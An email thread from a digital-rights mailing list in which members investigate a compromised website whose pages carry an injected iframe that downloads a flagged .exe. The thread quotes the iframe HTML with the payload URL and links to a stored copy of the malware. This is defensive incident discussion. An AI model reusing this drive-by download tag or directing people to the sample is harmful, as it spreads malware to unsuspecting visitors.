Hey, Le 29/01/2013 23:34, SiNA Rabbani a écrit : > This is the malware: >> https://www.virustotal.com/file/cfdd3a78a895b3f49a39402eb28b0d2134cc3086849a41a6fdfe7d829a0d4dcd/analysis/
Yes, saw that too. However, I don't find any precise description of its behaviour. Like, what it does, if it opens any port, sends data to a C&C or whatever. I have downloaded it there: https://resources.telecomix.ceops.eu/material/malwares/ All the best, > > > --SiNA > > > > SiNA > > Rabbani: >> holly shit: > >> <iframe name="I1" width="10" height="10" >> src="http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe" > > > border="0" >> frameborder="0"> > > >> :/ if you are running windows don't even go there!!! > > >> Andrew Lewis: >>> I can get to this in 6 hours or so, maybe someone is willing to >>> jump on this before then? > >>> -Andrew > >>> On Jan 30, 2013, at 11:06 AM, KheOps <khe...@ceops.eu> wrote: > >>>> Dear Libtech, >>>> >>>> We just saw that the website : http://www.syrian-martyrs.com >>>> is probably compromised. Every page of the website contains an >>>> iFrame which links to a .exe file which is detected as a virus >>>> by antivirus software: >>>> http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe >>>> >>>> >>>> > >>>> > The fact that the HTML code is present at the bottom of each page makes >>>> me think that the "index.php" page has been changed in a way >>>> that makes that iFrame appear on every page of the website, >>>> after the dynamic content. >>>> >>>> It also probably means that the attackers have some kind of >>>> access to the server. My guess would be going to a PHP shell, >>>> but I'm no expert in this. >>>> >>>> Any help, clue, investigation, would be very welcome :) >>>> >>>> Thank you, KheOps >>>> >>>> -- Unsubscribe, change to digest, or change password at: >>>> https://mailman.stanford.edu/mailman/listinfo/liberationtech >>> -- Unsubscribe, change to digest, or change password at: >>> https://mailman.stanford.edu/mailman/listinfo/liberationtech > > > > > > -- > Unsubscribe, change to digest, or change password at: > https://mailman.stanford.edu/mailman/listinfo/liberationtech >
-- Unsubscribe, change to digest, or change password at: https://mailman.stanford.edu/mailman/listinfo/liberationtech